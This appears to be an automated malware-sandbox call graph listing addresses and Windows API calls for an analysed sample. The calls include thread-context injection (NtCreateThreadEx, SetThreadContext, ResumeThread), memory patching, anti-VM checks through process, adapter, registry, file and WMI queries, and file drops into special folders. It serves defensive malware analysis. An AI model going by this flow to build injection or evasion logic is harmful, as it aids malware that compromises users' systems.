285c805c193 56122->56124 56123->56077 56125 285c805c1ba VirtualAlloc 56124->56125 56126 285c805c1e2 56124->56126 56125->56126 56210 285c809a748 GetModuleHandleA 56126->56210 56129 285c805c218 __scrt_initialize_thread_safe_statics 56130 285c805c22b GetCurrentProcess NtCreateThreadEx 56129->56130 56130->56123 56131 285c805c292 GetThreadContext 56130->56131 56132 285c805c2ac 56131->56132 56133 285c805c2b6 SetThreadContext 56131->56133 56132->56077 56133->56132 56134 285c805c2db ResumeThread 56133->56134 56134->56123 56165 285c80dbcb8 56135->56165 56138 285c80c9b40 16 API calls 56139 285c80c4ec6 56138->56139 56139->56092 56141 285c80c4f9a 56140->56141 56182 285c80c9af8 56141->56182 56143 285c80c4f9f 56144 285c80c4fa3 56143->56144 56188 285c80c9b54 4 API calls 3 library calls 56143->56188 56144->56102 56205 285c80c4fc4 56146->56205 56148 285c80c4e83 56148->56109 56150 285c80f7458 56149->56150 56152 285c80c5dfd __ExceptionPtr::__ExceptionPtr 56151->56152 56153 285c80c5e19 RtlCaptureContext RtlLookupFunctionEntry 56152->56153 56154 285c80c5e42 RtlVirtualUnwind 56153->56154 56155 285c80c5e7e __ExceptionPtr::__ExceptionPtr 56153->56155 56154->56155 56156 285c80c5eb0 IsDebuggerPresent 56155->56156 56157 285c80c5ef3 __scrt_fastfail 56156->56157 56157->56096 56159 285c80c4f3d __scrt_acquire_startup_lock 56158->56159 56160 285c80db70c 12 API calls 56159->56160 56161 285c80c4f51 56159->56161 56162 285c80dbacd 56160->56162 56161->56100 56162->56100 56163->56104 56164->56108 56168 285c80dc2f0 56165->56168 56169 285c80dc301 56168->56169 56170 285c80c4ec1 56168->56170 56178 285c80dc9f4 LoadLibraryExW GetLastError LoadLibraryExW TlsGetValue __vcrt_uninitialize_ptd 56169->56178 56170->56138 56172 285c80dc306 56172->56170 56179 285c80dca4c LoadLibraryExW GetLastError LoadLibraryExW TlsSetValue __vcrt_uninitialize_ptd 56172->56179 56174 285c80dc31b 56180 285c80dc190 11 API calls 2 library calls 56174->56180 56176 285c80dc323 56181 285c80da780 11 API calls 2 library calls 56176->56181 56178->56172 56179->56174 56180->56176 56181->56170 56183 285c80c9b01 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 56182->56183 56189 285c80ca554 56183->56189 56185 285c80c9b0b 56187 285c80c9b0f __vcrt_uninitialize_locks 56185->56187 56193 285c80ca318 6 API calls 3 library calls 56185->56193 56187->56143 56188->56144 56191 285c80ca55c 56189->56191 56192 285c80ca589 __vcrt_uninitialize_locks 56191->56192 56194 285c80ca0ac 56191->56194 56192->56185 56193->56187 56199 285c80c9d80 56194->56199 56196 285c80ca0e7 56197 285c80ca103 InitializeCriticalSectionAndSpinCount 56196->56197 56198 285c80ca0ef 56196->56198 56197->56198 56198->56191 56200 285c80c9de1 try_get_function 56199->56200 56201 285c80c9de6 __scrt_initialize_thread_safe_statics 56199->56201 56200->56201 56202 285c80c9e19 LoadLibraryExW 56200->56202 56201->56196 56202->56200 56203 285c80c9e3f GetLastError 56202->56203 56203->56200 56204 285c80c9e4a LoadLibraryExW 56203->56204 56204->56200 56206 285c80c5082 56205->56206 56209 285c80c4fdc __scrt_initialize_onexit_tables __scrt_acquire_startup_lock 56205->56209 56207 285c80c5dd8 __scrt_fastfail 5 API calls 56206->56207 56208 285c80c508c 56207->56208 56209->56148 56211 285c809a775 56210->56211 56213 285c805c1f1 GetModuleHandleW 56210->56213 56216 285c809b35c 56211->56216 56213->56129 56217 285c809a78b 56216->56217 56218 285c809b39b 56216->56218 56217->56213 56224 285c809a568 56217->56224 56218->56217 56219 285c809b4d0 56218->56219 56220 285c809b48a lstrcmpA 56218->56220 56219->56217 56221 285c809b4ec 56219->56221 56220->56218 56220->56219 56234 285c809b298 9 API calls 2 library calls 56221->56234 56223 285c809b4f7 56223->56217 56227 285c809a594 56224->56227 56226 285c809a61f 56226->56213 56228 285c809a5fa 56227->56228 56235 285c809a884 56227->56235 56228->56226 56243 285c809b0d8 56228->56243 56230 285c809a686 VirtualProtectEx 56230->56226 56231 285c809a6e8 VirtualProtectEx 56230->56231 56231->56226 56234->56223 56238 285c809a8b2 56235->56238 56236 285c809a92e 56240 285c809a954 VirtualQuery 56236->56240 56241 285c809a9aa 56236->56241 56242 285c809a977 VirtualAlloc 56236->56242 56237 285c809a8d1 VirtualQuery 56237->56238 56238->56236 56238->56237 56239 285c809a8f4 VirtualAlloc 56238->56239 56239->56238 56239->56241 56240->56236 56241->56228 56242->56236 56242->56241 56244 285c809b10a 56243->56244 56247 285c80c59d0 56244->56247 56246 285c809a650 56246->56226 56246->56230 56248 285c80c59da 56247->56248 56249 285c80c60d8 IsProcessorFeaturePresent 56248->56249 56250 285c80c59e6 56248->56250 56251 285c80c60ef 56249->56251 56250->56246 56254 285c80c62cc RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 56251->56254 56253 285c80c6102 56253->56246 56254->56253 56255 285c8059e00 56256 285c8059e64 WaitForSingleObject 56255->56256 56257 285c8059e6d 56255->56257 56256->56257 56258 285c8059e91 56257->56258 56411 285c8056c40 56257->56411 56427 285c809cd00 56258->56427 56261 285c8059e96 56262 285c805c0ab collate 56261->56262 56263 285c8059e9e 56261->56263 56506 285c80cae64 11 API calls 56263->56506 56265 285c8059ea5 56507 285c80cab80 23 API calls _Getcoll 56265->56507 56267 285c8059ead 56508 285c80cace4 15 API calls 4 library calls 56267->56508 56269 285c8059ed1 56509 285c8056b10 12 API calls 4 library calls 56269->56509 56272 285c805a0b9 56511 285c8056b10 12 API calls 4 library calls 56272->56511 56274 285c805a0fc 56512 285c8056b10 12 API calls 4 library calls 56274->56512 56276 285c805a146 56513 285c80571e0 70 API calls 2 library calls 56276->56513 56278 285c8059f24 56510 285c8056b10 12 API calls 4 library calls 56278->56510 56279 285c805a34c CoInitializeEx CoInitializeSecurity 56514 285c809a49c GetModuleHandleW __scrt_initialize_thread_safe_statics 56279->56514 56281 285c805a3b2 56515 285c809be80 31 API calls _Mpunct 56281->56515 56283 285c805a3be 56516 285c809bb80 31 API calls _Mpunct 56283->56516 56285 285c805a3c8 56517 285c80595d0 12 API calls collate 56285->56517 56287 285c805a3df 56518 285c8051460 35 API calls 2 library calls 56287->56518 56289 285c805a4de 56519 285c8097480 22 API calls std::_Winerror_message 56289->56519 56291 285c805a4eb 56292 285c805a509 56291->56292 56293 285c805a4ef CoUninitialize TerminateThread 56291->56293 56520 285c805c4c0 12 API calls messages 56292->56520 56302 285c805bfdf collate 56293->56302 56294 285c805a15c 56294->56279 56296 285c805a529 56521 285c805c4c0 12 API calls messages 56296->56521 56298 285c805a54b 56522 285c809c000 31 API calls _Mpunct 56298->56522 56300 285c805a558 56301 285c805a5af collate 56300->56301 56523 285c8058c10 12 API calls 4 library calls 56300->56523 56526 285c809bd00 31 API calls _Mpunct 56301->56526 56579 285c80576d0 RaiseException collate 56302->56579 56305 285c805a5c8 56308 285c805a61a collate 56305->56308 56527 285c8058c10 12 API calls 4 library calls 56305->56527 56306 285c805a57e 56524 285c80593d0 12 API calls 56306->56524 56311 285c8056c40 messages 12 API calls 56308->56311 56380 285c805a668 collate messages _Strcoll __ExceptionPtr::__ExceptionPtr 56311->56380 56312 285c805a598 56525 285c8058d60 12 API calls 4 library calls 56312->56525 56314 285c805a5e9 56528 285c80593d0 12 API calls 56314->56528 56316 285c805a603 56529 285c8058d60 12 API calls 4 library calls 56316->56529 56320 285c805b906 Sleep 56320->56380 56324 285c805a7a0 Sleep 56324->56380 56328 285c805a998 Sleep 56328->56380 56330 285c805b7f5 Sleep 56330->56380 56333 285c805b0f5 Sleep 56333->56380 56334 285c805c061 collate 56334->56262 56336 285c805b289 SHGetSpecialFolderPathA lstrcatA 56540 285c8097750 53 API calls 56336->56540 56339 285c805b43f SHGetSpecialFolderPathA lstrcatA 56545 285c809a9c8 CreateFileA WriteFile CloseHandle 56339->56545 56340 285c805b36a SHGetSpecialFolderPathA lstrcatA 56543 285c8097750 53 API calls 56340->56543 56341 285c805b932 56555 285c805c310 12 API calls 56341->56555 56344 285c8056b10 12 API calls _Mpunct 56344->56380 56347 285c805b9f1 56556 285c8093d60 12 API calls 4 library calls 56347->56556 56351 285c805ba1e 56557 285c806a7f0 98 API calls 6 library calls 56351->56557 56352 285c805bb86 56353 285c805bbb9 56352->56353 56354 285c805bb91 56352->56354 56357 285c8056c40 messages 12 API calls 56353->56357 56564 285c8057ed0 109 API calls 5 library calls 56354->56564 56360 285c805bbb7 56357->56360 56358 285c805c510 12 API calls 56358->56380 56359 285c805ba56 collate 56558 285c8057760 12 API calls messages 56359->56558 56565 285c8056b10 12 API calls 4 library calls 56360->56565 56361 285c805d0c0 12 API calls 56361->56380 56364 285c805bc01 GetCurrentProcessId 56566 285c8059d20 12 API calls 56364->56566 56367 285c805ba75 56559 285c80568f0 12 API calls _Mpunct 56367->56559 56368 285c805bc16 56567 285c805ca20 12 API calls collate 56368->56567 56371 285c805ba89 GetCurrentProcessId 56560 285c8059d20 12 API calls 56371->56560 56372 285c805bc23 56568 285c8058d60 12 API calls 4 library calls 56372->56568 56376 285c805ba9e 56561 285c805ca20 12 API calls collate 56376->56561 56379 285c805bd28 56570 285c8058d60 12 API calls 4 library calls 56379->56570 56380->56334 56380->56339 56380->56341 56380->56344 56380->56352 56380->56358 56380->56361 56395 285c80568f0 12 API calls 56380->56395 56410 285c8056730 12 API calls 56380->56410 56530 285c806a380 98 API calls 3 library calls 56380->56530 56531 285c8093d60 12 API calls 4 library calls 56380->56531 56532 285c806a7f0 98 API calls 6 library calls 56380->56532 56533 285c80cab54 23 API calls _Getcoll 56380->56533 56534 285c80c4dcc RaiseException Concurrency::cancel_current_task new 56380->56534 56535 285c805cf30 RaiseException messages Concurrency::critical_section::scoped_lock::scoped_lock 56380->56535 56536 285c80cab54 23 API calls _Getcoll 56380->56536 56537 285c80cab54 23 API calls _Getcoll 56380->56537 56538 285c8056430 28 API calls 56380->56538 56539 285c80cab54 23 API calls _Getcoll 56380->56539 56541 285c8057ae0 10 API calls 2 library calls 56380->56541 56542 285c80cab54 23 API calls _Getcoll 56380->56542 56544 285c8057cb0 25 API calls 2 library calls 56380->56544 56546 285c809b510 45 API calls 6 library calls 56380->56546 56547 285c8057ed0 109 API calls 5 library calls 56380->56547 56548 285c80980c0 12 API calls 56380->56548 56549 285c809802c 70 API calls 56380->56549 56550 285c808a9e0 160 API calls 3 library calls 56380->56550 56551 285c80593d0 12 API calls 56380->56551 56552 285c8056200 12 API calls 56380->56552 56553 285c80cab54 23 API calls _Getcoll 56380->56553 56554 285c80cab54 23 API calls _Getcoll 56380->56554 56382 285c805bc37 56569 285c8058c10 12 API calls 4 library calls 56382->56569 56383 285c805bd3f 56571 285c8058c10 12 API calls 4 library calls 56383->56571 56386 285c805bd55 56572 285c8058c10 12 API calls 4 library calls 56386->56572 56388 285c805bd7e 56573 285c805c310 12 API calls 56388->56573 56390 285c805baae collate 56562 285c809b510 45 API calls 6 library calls 56390->56562 56391 285c805bdaa 56574 285c8093d60 12 API calls 4 library calls 56391->56574 56393 285c805bdd4 56575 285c806a7f0 98 API calls 6 library calls 56393->56575 56395->56380 56398 285c805bb38 CoUninitialize TerminateThread 56401 285c805bb5a collate 56398->56401 56400 285c805be71 CoUninitialize TerminateThread 56404 285c805be91 56400->56404 56563 285c805c3d0 RaiseException 56401->56563 56402 285c805be05 56576 285c809b510 45 API calls 6 library calls 56402->56576 56407 285c805bb81 collate 56404->56407 56577 285c805c690 RaiseException Concurrency::cancel_current_task new 56404->56577 56578 285c805c3d0 RaiseException 56407->56578 56410->56380 56412 285c8056d47 56411->56412 56413 285c8056c6e 56411->56413 56582 285c80a0924 12 API calls 2 library calls 56412->56582 56415 285c8056cac 56413->56415 56416 285c8056c7d 56413->56416 56419 285c8056cb6 56415->56419 56420 285c8056d60 56415->56420 56417 285c8056d53 56416->56417 56418 285c8056c8b 56416->56418 56583 285c80a0924 12 API calls 2 library calls 56417->56583 56580 285c8056f60 12 API calls 2 library calls 56418->56580 56424 285c8056ca7 std::_Maklocwcs 56419->56424 56581 285c8057030 RaiseException Concurrency::cancel_current_task new std::_Maklocwcs 56419->56581 56584 285c80a0900 12 API calls 2 library calls 56420->56584 56424->56258 56585 285c80a0220 GetProcessHeap HeapAlloc 56427->56585 56429 285c809cd10 56430 285c809cd14 56429->56430 56592 285c80a0330 CreateToolhelp32Snapshot 56429->56592 56430->56261 56433 285c809cd3e 56433->56261 56436 285c809cd65 56436->56261 56437 285c809cd7b GetModuleHandleW 56438 285c809cd92 __scrt_initialize_thread_safe_statics 56437->56438 56610 285c809f230 56438->56610 56440 285c809cdb3 56441 285c809cfe7 56440->56441 56620 285c809d230 56440->56620 56441->56261 56449 285c809cdf7 56449->56441 56450 285c80a0220 10 API calls 56449->56450 56451 285c809ce13 56450->56451 56666 285c809d870 56451->56666 56454 285c809ce51 56674 285c809d990 56454->56674 56456 285c809ce62 56683 285c809da30 56456->56683 56460 285c809ce83 56705 285c809dcc0 56460->56705 56464 285c809ce9f 56732 285c809e070 56464->56732 56466 285c809cead 56736 285c809e5c0 56466->56736 56468 285c809cebb 56751 285c809e7d0 56468->56751 56470 285c809cec9 56767 285c809e1c0 56470->56767 56472 285c809ced7 56782 285c809e3a0 56472->56782 56474 285c809cee5 56797 285c809ea60 56474->56797 56476 285c809cef3 56476->56441 56814 285c809fec0 56476->56814 56486 285c809cf46 56850 285c809f080 56486->56850 56488 285c809cf54 56488->56441 56853 285c809f2f0 56488->56853 56494 285c809cf85 56494->56441 56892 285c809fe10 56494->56892 56497 285c80a0220 10 API calls 56498 285c809cfab 56497->56498 56498->56441 56899 285c809fa60 56498->56899 56506->56265 56507->56267 56508->56269 56509->56278 56510->56272 56511->56274 56512->56276 56513->56294 56514->56281 56515->56283 56516->56285 56517->56287 56518->56289 56519->56291 56520->56296 56521->56298 56522->56300 56523->56306 56524->56312 56525->56301 56526->56305 56527->56314 56528->56316 56529->56308 56530->56380 56531->56380 56532->56380 56533->56324 56534->56380 56535->56380 56536->56328 56537->56333 56538->56380 56539->56336 56540->56380 56541->56380 56542->56340 56543->56380 56544->56380 56545->56380 56546->56380 56547->56380 56548->56380 56549->56380 56550->56380 56551->56380 56552->56380 56553->56330 56554->56320 56555->56347 56556->56351 56557->56359 56558->56367 56559->56371 56560->56376 56561->56390 56562->56398 56563->56407 56564->56360 56565->56364 56566->56368 56567->56372 56568->56382 56569->56379 56570->56383 56571->56386 56572->56388 56573->56391 56574->56393 56575->56402 56576->56400 56577->56407 56578->56302 56579->56334 56580->56424 56581->56424 56582->56417 56583->56420 56586 285c80a026d GetAdaptersInfo 56585->56586 56587 285c80a025b 56585->56587 56588 285c80a0280 GetProcessHeap HeapFree GetProcessHeap HeapAlloc 56586->56588 56591 285c80a02c2 GetProcessHeap HeapFree 56586->56591 56587->56429 56588->56587 56589 285c80a02b4 GetAdaptersInfo 56588->56589 56589->56591 56591->56429 56593 285c80a03ed 56592->56593 56594 285c80a0374 Process32FirstW 56592->56594 56599 285c80c59d0 collate 4 API calls 56593->56599 56595 285c80a038e StrCmpIW 56594->56595 56596 285c80a03e4 CloseHandle 56594->56596 56597 285c80a03af Process32NextW 56595->56597 56598 285c80a03a3 CloseHandle 56595->56598 56596->56593 56597->56596 56601 285c80a03be 56597->56601 56598->56593 56600 285c809cd31 56599->56600 56600->56433 56604 285c809d010 56600->56604 56602 285c80a03c0 StrCmpIW 56601->56602 56602->56598 56603 285c80a03d5 Process32NextW 56602->56603 56603->56596 56603->56602 56605 285c809d190 56604->56605 56606 285c80a0330 12 API calls 56605->56606 56607 285c809d1a7 56605->56607 56606->56605 56608 285c80c59d0 collate 4 API calls 56607->56608 56609 285c809cd59 56608->56609 56609->56436 56609->56437 56611 285c809f25b __ExceptionPtr::__ExceptionPtr 56610->56611 56930 285c809d1d0 56611->56930 56614 285c809f2d4 56617 285c80c59d0 collate 4 API calls 56614->56617 56615 285c809f2ac RegCloseKey 56616 285c80c59d0 collate 4 API calls 56615->56616 56618 285c809f2cc 56616->56618 56619 285c809f2e6 56617->56619 56618->56440 56619->56440 56623 285c809d2f0 __ExceptionPtr::__ExceptionPtr 56620->56623 56621 285c809d1d0 35 API calls 56621->56623 56623->56621 56624 285c809d34a 56623->56624 56949 285c80a0130 56623->56949 56625 285c80c59d0 collate 4 API calls 56624->56625 56626 285c809cdcd 56625->56626 56627 285c809d380 56626->56627 56628 285c809d420 __ExceptionPtr::__ExceptionPtr 56627->56628 56629 285c809d1d0 35 API calls 56628->56629 56632 285c809d48b 56628->56632 56630 285c809d456 RegOpenKeyExW 56629->56630 56630->56628 56631 285c809d48f RegCloseKey 56630->56631 56631->56632 56633 285c80c59d0 collate 4 API calls 56632->56633 56634 285c809cddb 56633->56634 56635 285c809d4d0 56634->56635 56636 285c809d5d9 __ExceptionPtr::__ExceptionPtr 56635->56636 56637 285c809d5ea GetWindowsDirectoryW 56636->56637 56961 285c80a00a0 56637->56961 56639 285c809d608 56640 285c809d60c Wow64DisableWow64FsRedirection 56639->56640 56642 285c809d617 __ExceptionPtr::__ExceptionPtr 56639->56642 56640->56642 56641 285c809d620 PathCombineW 56641->56642 56642->56641 56643 285c809d1d0 35 API calls 56642->56643 56649 285c809d682 56642->56649 56644 285c809d666 GetFileAttributesW 56643->56644 56644->56642 56645 285c809d6b0 56646 285c80c59d0 collate 4 API calls 56645->56646 56647 285c809cde9 56646->56647 56652 285c809d740 56647->56652 56648 285c809d6ef GetCurrentProcess 56650 285c809d6ff 56648->56650 56649->56645 56649->56648 56650->56645 56651 285c809d706 Wow64RevertWow64FsRedirection 56650->56651 56651->56645 56653 285c809d76e __ExceptionPtr::__ExceptionPtr 56652->56653 56654 285c80a00a0 GetCurrentProcess 56653->56654 56655 285c809d7cb 56654->56655 56656 285c809d7d7 ExpandEnvironmentStringsW 56655->56656 56657 285c809d7ec SHGetSpecialFolderPathW 56655->56657 56658 285c809d7fb PathCombineW GetFileAttributesW 56656->56658 56657->56658 56659 285c809d829 56658->56659 56660 285c809d84a 56658->56660 56659->56660 56661 285c809d82d 56659->56661 56662 285c80c59d0 collate 4 API calls 56660->56662 56663 285c80c59d0 collate 4 API calls 56661->56663 56664 285c809d85c 56662->56664 56665 285c809d842 56663->56665 56664->56449 56665->56449 56667 285c809d8e0 CreateFileW 56666->56667 56669 285c809d924 __ExceptionPtr::__ExceptionPtr 56667->56669 56668 285c809d1d0 35 API calls 56668->56669 56669->56667 56669->56668 56670 285c809d950 CloseHandle 56669->56670 56671 285c809d94c 56669->56671 56670->56671 56672 285c80c59d0 collate 4 API calls 56671->56672 56673 285c809ce22 FindWindowW FindWindowW 56672->56673 56673->56454 56675 285c80c8ef0 __ExceptionPtr::__ExceptionPtr 56674->56675 56676 285c809d9bb WNetGetProviderNameW 56675->56676 56677 285c809da0f 56676->56677 56678 285c809d9dc StrCmpIW 56676->56678 56679 285c80c59d0 collate 4 API calls 56677->56679 56680 285c80c59d0 collate 4 API calls 56678->56680 56681 285c809da21 56679->56681 56682 285c809da07 56680->56682 56681->56456 56682->56456 56685 285c809da70 __ExceptionPtr::__ExceptionPtr 56683->56685 56684 285c809d1d0 35 API calls 56684->56685 56685->56684 56686 285c80a0330 12 API calls 56685->56686 56687 285c809dab5 56685->56687 56686->56685 56688 285c80c59d0 collate 4 API calls 56687->56688 56689 285c809ce75 56688->56689 56690 285c809dae0 56689->56690 56966 285c80a0410 CoInitializeEx 56690->56966 56692 285c809db0b 56693 285c809db13 SysAllocString SysAllocString 56692->56693 56694 285c809dcb5 56692->56694 56695 285c809dbaa 56693->56695 56700 285c809db55 56693->56700 56694->56460 56696 285c809dbb4 SysFreeString 56695->56696 56703 285c809dbbd wcsstr 56695->56703 56696->56703 56697 285c809dba1 SysFreeString 56697->56695 56698 285c809dca5 56698->56460 56699 285c809dc7f CoUninitialize 56699->56698 56700->56697 56701 285c809db9b CoUninitialize 56700->56701 56701->56697 56703->56698 56703->56699 56704 285c809dc5a VariantClear 56703->56704 56704->56703 56706 285c80a0410 9 API calls 56705->56706 56707 285c809dd20 56706->56707 56708 285c809dd28 SysAllocString SysAllocString 56707->56708 56709 285c809df97 56707->56709 56710 285c809ddc0 56708->56710 56716 285c809dd6a 56708->56716 56711 285c80c59d0 collate 4 API calls 56709->56711 56712 285c809ddc5 SysFreeString 56710->56712 56719 285c809ddce 56710->56719 56714 285c809ce91 56711->56714 56712->56719 56713 285c809ddb7 SysFreeString 56713->56710 56729 285c809dfd0 56714->56729 56715 285c809df69 CoUninitialize 56715->56709 56716->56713 56717 285c809ddb1 CoUninitialize 56716->56717 56717->56713 56719->56709 56719->56715 56720 285c809de60 StrCmpIW 56719->56720 56721 285c809df48 VariantClear 56719->56721 56720->56721 56722 285c809de79 VariantClear 56720->56722 56721->56719 56723 285c809dea5 SafeArrayAccessData 56722->56723 56723->56721 56724 285c809debe SafeArrayGetLBound SafeArrayGetUBound 56723->56724 56725 285c809df3f SafeArrayUnaccessData 56724->56725 56726 285c809def0 SafeArrayGetElement 56724->56726 56725->56721 56728 285c809df10 56726->56728 56728->56725 56728->56726 56979 285c80d19f0 25 API calls 4 library calls 56728->56979 56980 285c80a0670 56729->56980 56731 285c809dff1 56731->56464 56735 285c809e08a 56732->56735 56733 285c809e092 56733->56466 56734 285c80a0670 58 API calls 56734->56735 56735->56733 56735->56734 56737 285c80a0410 9 API calls 56736->56737 56738 285c809e5e5 56737->56738 56739 285c809e5ed SysAllocString SysAllocString 56738->56739 56740 285c809e7c3 56738->56740 56741 285c809e684 56739->56741 56746 285c809e62f 56739->56746 56740->56468 56743 285c809e692 wcsstr 56741->56743 56744 285c809e689 SysFreeString 56741->56744 56742 285c809e67b SysFreeString 56742->56741 56745 285c809e7ab 56743->56745 56747 285c809e77a CoUninitialize 56743->56747 56750 285c809e759 VariantClear 56743->56750 56744->56743 56745->56468 56746->56742 56748 285c809e675 CoUninitialize 56746->56748 56747->56745 56748->56742 56750->56743 56752 285c80a0410 9 API calls 56751->56752 56753 285c809e800 56752->56753 56754 285c809ea47 56753->56754 56755 285c809e808 SysAllocString SysAllocString 56753->56755 56754->56470 56756 285c809e8a5 56755->56756 56760 285c809e850 56755->56760 56757 285c809e8b2 SysFreeString 56756->56757 56765 285c809e8bb wcsstr 56756->56765 56757->56765 56758 285c809e89c SysFreeString 56758->56756 56759 285c809ea34 56759->56470 56760->56758 56762 285c809e896 CoUninitialize 56760->56762 56761 285c809ea0e CoUninitialize 56761->56759 56762->56758 56764 285c809e96d VariantClear 56764->56765 56765->56759 56765->56761 56765->56764 56766 285c809e9e9 VariantClear 56765->56766 56766->56765 56768 285c80a0410 9 API calls 56767->56768 56769 285c809e1eb 56768->56769 56770 285c809e1f3 SysAllocString SysAllocString 56769->56770 56771 285c809e38c 56769->56771 56772 285c809e28a 56770->56772 56777 285c809e235 56770->56777 56771->56472 56774 285c809e294 SysFreeString 56772->56774 56781 285c809e29d wcsstr 56772->56781 56773 285c809e281 SysFreeString 56773->56772 56774->56781 56775 285c809e37c 56775->56472 56776 285c809e358 CoUninitialize 56776->56775 56777->56773 56778 285c809e27b CoUninitialize 56777->56778 56778->56773 56780 285c809e333 VariantClear 56780->56781 56781->56775 56781->56776 56781->56780 56783 285c80a0410 9 API calls 56782->56783 56784 285c809e3c5 56783->56784 56785 285c809e3cd SysAllocString SysAllocString 56784->56785 56786 285c809e5ab 56784->56786 56787 285c809e405 56785->56787 56788 285c809e45a 56785->56788 56786->56474 56789 285c809e451 SysFreeString 56787->56789 56793 285c809e44b CoUninitialize 56787->56793 56790 285c809e464 SysFreeString 56788->56790 56796 285c809e46d wcsstr 56788->56796 56789->56788 56790->56796 56791 285c809e59d 56791->56474 56792 285c809e570 CoUninitialize 56792->56791 56793->56789 56795 285c809e54f VariantClear 56795->56796 56796->56791 56796->56792 56796->56795 56798 285c80a0410 9 API calls 56797->56798 56799 285c809ea8b 56798->56799 56800 285c809ece3 56799->56800 56801 285c809ea93 SysAllocString SysAllocString 56799->56801 56800->56476 56802 285c809eb2a 56801->56802 56807 285c809ead5 56801->56807 56804 285c809eb34 SysFreeString 56802->56804 56812 285c809eb3d wcsstr 56802->56812 56803 285c809eb21 SysFreeString 56803->56802 56804->56812 56805 285c809ecd3 56805->56476 56806 285c809ecad CoUninitialize 56806->56805 56807->56803 56808 285c809eb1b CoUninitialize 56807->56808 56808->56803 56810 285c809ebde VariantClear 56810->56812 56811 285c809ec33 VariantClear 56811->56812 56812->56805 56812->56806 56812->56810 56812->56811 56813 285c809ec88 VariantClear 56812->56813 56813->56812 56815 285c809ff00 __ExceptionPtr::__ExceptionPtr 56814->56815 56816 285c809d1d0 35 API calls 56815->56816 56817 285c80a0330 12 API calls 56815->56817 56818 285c809ff45 56815->56818 56816->56815 56817->56815 56819 285c80c59d0 collate 4 API calls 56818->56819 56820 285c809cf07 56819->56820 56820->56441 56821 285c809ecf0 56820->56821 56824 285c809ed60 __ExceptionPtr::__ExceptionPtr 56821->56824 56822 285c809d1d0 35 API calls 56822->56824 56823 285c80a0130 9 API calls 56823->56824 56824->56822 56824->56823 56825 285c809edac 56824->56825 56826 285c80c59d0 collate 4 API calls 56825->56826 56827 285c809cf1c 56826->56827 56828 285c809ede0 56827->56828 56830 285c809ee30 __ExceptionPtr::__ExceptionPtr 56828->56830 56829 285c809d1d0 35 API calls 56829->56830 56830->56829 56831 285c80a0330 12 API calls 56830->56831 56832 285c809ee75 56830->56832 56831->56830 56833 285c80c59d0 collate 4 API calls 56832->56833 56834 285c809cf2a 56833->56834 56835 285c809eea0 56834->56835 56838 285c809eed6 __ExceptionPtr::__ExceptionPtr 56835->56838 56836 285c809ef48 SHGetSpecialFolderPathW 56837 285c809ef5f PathCombineW 56836->56837 56839 285c809d1d0 35 API calls 56837->56839 56838->56836 56841 285c809f019 GetCurrentProcess 56838->56841 56842 285c809efba 56838->56842 56844 285c809f033 ExpandEnvironmentStringsW 56838->56844 56840 285c809ef95 GetFileAttributesW 56839->56840 56840->56838 56841->56838 56843 285c80c59d0 collate 4 API calls 56842->56843 56845 285c809cf38 56843->56845 56844->56837 56846 285c809f110 56845->56846 56847 285c809f12b 56846->56847 56848 285c809f152 56847->56848 56849 285c80a0670 58 API calls 56847->56849 56848->56486 56849->56847 56851 285c80a0670 58 API calls 56850->56851 56852 285c809f0a1 56851->56852 56852->56488 56854 285c809f370 __ExceptionPtr::__ExceptionPtr 56853->56854 56855 285c809d1d0 35 API calls 56854->56855 56858 285c809f3d5 56854->56858 56856 285c809f3a0 RegOpenKeyExW 56855->56856 56856->56854 56857 285c809f3d9 RegCloseKey 56856->56857 56857->56858 56859 285c80c59d0 collate 4 API calls 56858->56859 56860 285c809cf69 56859->56860 56861 285c809f410 56860->56861 56862 285c809f4cc __ExceptionPtr::__ExceptionPtr 56861->56862 56863 285c809f4dd GetWindowsDirectoryW 56862->56863 56864 285c80a00a0 GetCurrentProcess 56863->56864 56865 285c809f4fb 56864->56865 56866 285c809f4ff Wow64DisableWow64FsRedirection 56865->56866 56868 285c809f50a __ExceptionPtr::__ExceptionPtr 56865->56868 56866->56868 56867 285c809f510 PathCombineW 56867->56868 56868->56867 56869 285c809d1d0 35 API calls 56868->56869 56875 285c809f572 56868->56875 56870 285c809f556 GetFileAttributesW 56869->56870 56870->56868 56871 285c809f5a0 56872 285c80c59d0 collate 4 API calls 56871->56872 56873 285c809cf77 56872->56873 56878 285c809f630 56873->56878 56874 285c809f5df GetCurrentProcess 56876 285c809f5ef 56874->56876 56875->56871 56875->56874 56876->56871 56877 285c809f5f6 Wow64RevertWow64FsRedirection 56876->56877 56877->56871 56879 285c809f65e __ExceptionPtr::__ExceptionPtr 56878->56879 56880 285c80a00a0 GetCurrentProcess 56879->56880 56881 285c809f68f 56880->56881 56882 285c809f6b0 SHGetSpecialFolderPathW 56881->56882 56883 285c809f69b ExpandEnvironmentStringsW 56881->56883 56884 285c809f6bf PathCombineW GetFileAttributesW 56882->56884 56883->56884 56885 285c809f6ed 56884->56885 56886 285c809f70e 56884->56886 56885->56886 56887 285c809f6f1 56885->56887 56888 285c80c59d0 collate 4 API calls 56886->56888 56889 285c80c59d0 collate 4 API calls 56887->56889 56890 285c809f720 56888->56890 56891 285c809f706 56889->56891 56890->56494 56891->56494 56894 285c809fe50 __ExceptionPtr::__ExceptionPtr 56892->56894 56893 285c809d1d0 35 API calls 56893->56894 56894->56893 56895 285c80a0330 12 API calls 56894->56895 56896 285c809fe95 56894->56896 56895->56894 56897 285c80c59d0 collate 4 API calls 56896->56897 56898 285c809cf96 56897->56898 56898->56497 56900 285c80a0410 9 API calls 56899->56900 56901 285c809fa85 56900->56901 56902 285c809fa8d SysAllocString SysAllocString 56901->56902 56903 285c809cfbc 56901->56903 56904 285c809fac5 56902->56904 56905 285c809fb1a 56902->56905 56903->56441 56917 285c809f810 56903->56917 56907 285c809fb11 SysFreeString 56904->56907 56910 285c809fb0b CoUninitialize 56904->56910 56906 285c809fb24 SysFreeString 56905->56906 56909 285c809fb2d 56905->56909 56906->56909 56907->56905 56908 285c809fc15 CoUninitialize 56908->56903 56909->56903 56909->56908 56912 285c809fbf4 VariantClear 56909->56912 56913 285c809fbb2 StrStrIW 56909->56913 56910->56907 56912->56909 56914 285c809fc17 VariantClear 56913->56914 56915 285c809fbc8 StrStrIW 56913->56915 56914->56908 56915->56914 56916 285c809fbde StrStrIW 56915->56916 56916->56912 56916->56914 56918 285c809f919 56917->56918 56919 285c809f921 GetUserNameW 56918->56919 56920 285c809f933 56918->56920 56919->56920 56924 285c809f959 56919->56924 56921 285c80c59d0 collate 4 API calls 56920->56921 56922 285c809cfcd 